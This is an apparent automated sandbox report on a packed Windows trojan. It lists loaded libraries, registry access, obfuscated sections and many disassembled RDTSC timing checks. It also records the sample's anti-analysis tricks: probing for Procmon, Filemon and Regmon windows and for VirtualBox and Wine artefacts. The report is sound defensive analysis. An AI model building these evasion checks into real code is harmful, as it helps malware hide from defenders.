              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00624A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: kerxdhhv ZLIB complexity 0.9947445160167131
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00643A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00643A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_0063CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\DGW29PY8.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1760768 > 1048576
              Source: file.exeStatic PE information: Raw size of kerxdhhv is bigger than: 0x100000 < 0x193e00

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.620000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kerxdhhv:EW;dedzcksa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kerxdhhv:EW;dedzcksa:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00646390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00646390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1afc11 should be: 0x1b91a4
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: kerxdhhv
              Source: file.exeStatic PE information: section name: dedzcksa
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A80AB push 321B65EDh; mov dword ptr [esp], edx0_2_009A8124
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A80AB push edi; mov dword ptr [esp], 54F3773Bh0_2_009A8192
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A80AB push 7A88B857h; mov dword ptr [esp], ecx0_2_009A81A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A80AB push ecx; mov dword ptr [esp], edx0_2_009A81AF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A80AB push 46F3AAB2h; mov dword ptr [esp], esi0_2_009A81BF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A80AB push ebp; mov dword ptr [esp], eax0_2_009A81CD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A03094 push 77C59282h; mov dword ptr [esp], edx0_2_00A030BC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A03094 push eax; mov dword ptr [esp], edi0_2_00A030D4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4689C push esi; mov dword ptr [esp], edx0_2_00A468B8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4689C push 48D9D255h; mov dword ptr [esp], edx0_2_00A46948
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A058FF push 5AE837D9h; mov dword ptr [esp], ebx0_2_00A0594E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A058FF push 416C5849h; mov dword ptr [esp], ecx0_2_00A05969
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7D0C4 push 28E29432h; mov dword ptr [esp], ebp0_2_00A7D158
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7D0C4 push 25A942D8h; mov dword ptr [esp], edx0_2_00A7D1F1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7D0C4 push edi; mov dword ptr [esp], eax0_2_00A7D211
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5C0D8 push edx; mov dword ptr [esp], 3E6BEDA6h0_2_00A5C0EB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5B8DA push ebx; mov dword ptr [esp], ecx0_2_00A5B903
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5B8DA push 0C17DCF2h; mov dword ptr [esp], esi0_2_00A5B95E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAE036 push 35A7D311h; mov dword ptr [esp], eax0_2_00AAE067
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F6038 push 4ED7B707h; mov dword ptr [esp], ebp0_2_009F604D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD7004 push esi; mov dword ptr [esp], edi0_2_00AD7026
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FB076 push ecx; mov dword ptr [esp], ebx0_2_009FB0B1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00647895 push ecx; ret 0_2_006478A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4A852 push esi; mov dword ptr [esp], eax0_2_00A4A8B1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push edi; mov dword ptr [esp], eax0_2_009D807C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push 64E36653h; mov dword ptr [esp], ecx0_2_009D80EE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push edx; mov dword ptr [esp], 00000004h0_2_009D811C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push edx; mov dword ptr [esp], ebp0_2_009D8134
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push 7F976B30h; mov dword ptr [esp], eax0_2_009D814F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push ebp; mov dword ptr [esp], edx0_2_009D823A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push edi; mov dword ptr [esp], esi0_2_009D8252
              Source: file.exeStatic PE information: section name: kerxdhhv entropy: 7.952968465504712

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00646390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00646390

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-25692
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8702D3 second address: 8702EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF7B0C9CD55h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FB60 second address: 86FB65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0E99 second address: 9E0E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFE0C second address: 9DFE39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCFh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF7B0F3BFD4h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFE39 second address: 9DFE4C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007FF7B0C9CD46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFE4C second address: 9DFE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFFF4 second address: 9DFFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFFF8 second address: 9E0004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jg 00007FF7B0F3BFC6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E01CD second address: 9E01DD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7B0C9CD46h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E01DD second address: 9E01E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E033A second address: 9E0365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF7B0C9CD51h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FF7B0C9CD4Bh 0x00000011 jp 00007FF7B0C9CD4Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E37B1 second address: 9E37C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007FF7B0F3BFC6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E37C4 second address: 9E381B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movsx ecx, bx 0x0000000c push 00000000h 0x0000000e jbe 00007FF7B0C9CD4Ch 0x00000014 pushad 0x00000015 mov dx, 638Bh 0x00000019 cld 0x0000001a popad 0x0000001b call 00007FF7B0C9CD49h 0x00000020 jmp 00007FF7B0C9CD59h 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF7B0C9CD50h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E381B second address: 9E381F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E381F second address: 9E383F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FF7B0C9CD48h 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push edx 0x00000013 jp 00007FF7B0C9CD46h 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E383F second address: 9E3843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3843 second address: 9E385B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF7B0C9CD4Dh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3929 second address: 9E39B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FF7B0F3BFCDh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 jmp 00007FF7B0F3BFD8h 0x00000018 jmp 00007FF7B0F3BFD2h 0x0000001d popad 0x0000001e pop eax 0x0000001f jmp 00007FF7B0F3BFCFh 0x00000024 lea ebx, dword ptr [ebp+124476B5h] 0x0000002a je 00007FF7B0F3BFC6h 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 jmp 00007FF7B0F3BFD7h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FF7B0F3BFCBh 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3D12 second address: 9E3D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F62CD second address: 9F62E7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF7B0F3BFCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FF7B0F3BFC6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01771 second address: A01775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0191A second address: A0191E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01A50 second address: A01A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01A56 second address: A01A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01B9C second address: A01BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01BA0 second address: A01BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FF7B0F3BFD1h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF7B0F3BFCCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01BCD second address: A01BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01BD1 second address: A01BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A023CF second address: A023FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 js 00007FF7B0C9CD46h 0x0000000b jp 00007FF7B0C9CD46h 0x00000011 jc 00007FF7B0C9CD46h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FF7B0C9CD4Fh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A023FA second address: A023FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02526 second address: A0252B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0252B second address: A0253D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF7B0F3BFCDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A026CF second address: A026DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FAFD2 second address: 9FAFD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFE8D second address: 9CFE96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFE96 second address: 9CFE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02ED0 second address: A02EDC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7B0C9CD4Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0302F second address: A0304E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF7B0F3BFD3h 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03416 second address: A0344C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FF7B0C9CD61h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF7B0C9CD59h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0344C second address: A03466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03466 second address: A03482 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FF7B0C9CD4Ah 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03482 second address: A0349B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0349B second address: A034A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A034A0 second address: A034AA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF7B0F3BFCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07D3F second address: A07D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0C9CD59h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07EAD second address: A07EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A065E6 second address: A065EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A065EC second address: A065F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07FB6 second address: A07FC0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF7B0C9CD4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A080E7 second address: A080F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FF7B0F3BFC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6A98 second address: 9D6A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6A9D second address: 9D6AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCBh 0x00000007 ja 00007FF7B0F3BFD2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007FF7B0F3BFD2h 0x0000001a popad 0x0000001b jo 00007FF7B0F3BFD5h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 jmp 00007FF7B0F3BFCDh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6AF2 second address: 9D6AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4F41 second address: 9D4F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 jne 00007FF7B0F3BFC8h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4F50 second address: 9D4F5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF7B0C9CD46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4F5B second address: 9D4F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF7B0F3BFCFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FF7B0F3BFC6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0EE37 second address: A0EE59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF7B0C9CD56h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0F25E second address: A0F282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD2h 0x00000007 jc 00007FF7B0F3BFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007FF7B0F3BFC8h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0F593 second address: A0F59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF7B0C9CD46h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0F59E second address: A0F5B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FF7B0F3BFCCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0F5B9 second address: A0F5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
